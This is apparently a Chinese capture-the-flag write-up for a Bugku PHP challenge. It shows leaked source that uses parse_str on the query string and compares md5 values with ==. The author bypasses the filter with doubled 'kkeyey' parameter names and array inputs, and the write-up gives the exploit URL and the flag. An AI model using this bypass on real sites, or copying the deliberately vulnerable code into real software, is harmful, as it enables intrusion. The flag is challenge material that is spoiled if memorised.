看了很多大佬的,都说用大佬写的脚本php代码泄露检测的小工具, 然后跑出漏洞
小白还是什么都不会 只好用 御剑了
跑出这个之后 打开发现 是一个下载的文件
下载打开后
源码为
<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>
是个东西
整段代码的意思是将get的两个参数中的key替换为空(这里可以用kekeyy绕过),然后对key1,key2的值进行md5加密,并进行比较,
如果md5加密的值一样而未加密的值不同,就输出flag.
构造
http://120.24.86.145:8002/web16/?kkeyey1[]=1&kkeyey2[]=a
回报出 flag
Bugku{OH_YOU_FIND_MY_MOMY}